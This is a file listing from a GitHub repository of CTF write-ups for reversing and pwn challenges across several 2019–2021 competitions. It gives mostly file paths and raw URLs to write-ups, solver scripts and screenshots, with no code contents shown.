https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Plaid CTF 2020/rev/YOU wa SHOCKWAVE/solver.py -------------------------------------------------------------------------------- /Poseidon CTF 1st Edition/PWN/Cards/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Poseidon CTF 1st Edition/PWN/Cards/sploit.py -------------------------------------------------------------------------------- /Poseidon CTF 1st Edition/PWN/Oldnote/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Poseidon CTF 1st Edition/PWN/Oldnote/sploit.py -------------------------------------------------------------------------------- /Poseidon CTF 1st Edition/REV/Dune/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Poseidon CTF 1st Edition/REV/Dune/solver.py -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/README.md -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/final.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/gdb.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/ida.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/ida1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/ida1.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/ida2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/ida2.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/ida3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/ida3.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Auction/xor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Auction/xor.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Battle/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Battle/README.md -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Battle/ida1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Battle/ida1.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Battle/ida2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Battle/ida2.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Battle/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Battle/sploit.py -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Hide and seek/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Hide and seek/README.md -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Hide and seek/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Hide and seek/ida.png -------------------------------------------------------------------------------- /Praygan CTF 2020/binary/Hide and seek/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Praygan CTF 2020/binary/Hide and seek/sploit.py -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Welcome to my Github 2 | -------------------------------------------------------------------------------- /RedpwCTF 2021/rev/pickled-onions/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/RedpwCTF 2021/rev/pickled-onions/README.md -------------------------------------------------------------------------------- /RedpwCTF 2021/rev/pickled-onions/final: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/RedpwCTF 2021/rev/pickled-onions/final -------------------------------------------------------------------------------- /RedpwCTF 2021/rev/pickled-onions/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/RedpwCTF 2021/rev/pickled-onions/solver.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/sploit.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/CARL FRIEDRICH GAUSS 5/task -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/README.md: -------------------------------------------------------------------------------- 1 | Solutions of REVERSING challenges during the NCSC CTF. 2 | -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/generate_right_key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/generate_right_key -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/generate_right_key.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/generate_right_key.c -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/sploit.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/Reverse Engineering/time traveler/task -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn1/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn1/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn1/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn1/solver.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn1/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn1/task -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn2/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn2/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn2/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn2/solver.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn2/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn2/task -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn3/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn3/README.md -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn3/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn3/solver.py -------------------------------------------------------------------------------- /SECURINETS Congress CTF 2020/pwn/pwn3/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SECURINETS Congress CTF 2020/pwn/pwn3/task -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/CHANGE/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/CHANGE/README.md -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/CHANGE/dump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/CHANGE/dump.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/CHANGE/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/CHANGE/exec.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/CHANGE/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/CHANGE/final.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/KAVM/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/KAVM/README.md -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/README.md -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/exec.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/Warmup : Welcome to securinets CTF/main.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/README.md -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/exec.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/functions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/functions.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/last.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/last.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/main.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/ren.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/ren.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/right.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/sol.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/sol.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/start.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/strings.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/xref.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS REVENGE/xref.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS/README.md -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS/exec.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS/ida.png -------------------------------------------------------------------------------- /Securinets CTF Quals 2020/REVERSING/static EYELESS/value.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets CTF Quals 2020/REVERSING/static EYELESS/value.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/args.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/args.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/bin -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/instructions.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/instructions.txt -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/main.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/solver.py -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/AutomateMe/text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/AutomateMe/text.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/bin -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/executing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/executing.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/flag.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/input.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/matrix.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/matrix.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/pol.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/pol.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/res.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Matrix of hell/xor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Matrix of hell/xor.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/chall.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/chall.zip -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/decrypt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/decrypt.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/func.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/func.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/main.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/rc4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/rc4.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/RBOOM/xor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/RBOOM/xor.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/README.md: -------------------------------------------------------------------------------- 1 | ## these are writeups for my challs in securinets QUALS CTF 2019. 2 | -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/VECTORS.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/VECTORS.zip -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/begin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/begin.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/copy.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/end.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/end.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/excute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/excute.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/final.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/flag.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/init1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/init1.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/init2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/init2.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/main.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/right.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/sort.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/sort.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/strings.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/wrong_input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/wrong_input.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/Vectors/xor_correct.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/Vectors/xor_correct.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/MONSTER.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/MONSTER.zip -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/cat.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/dat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/dat.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/flag.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/go.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/go.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/input.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/main.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/md5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/md5.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/strcmp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/strcmp.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/monster/xor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/monster/xor.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/README.md -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/bin -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/call_b64encode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/call_b64encode.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/call_b64encode1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/call_b64encode1.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/checksb64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/checksb64.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/executing.png: -------------------------------------------------------------------------------- 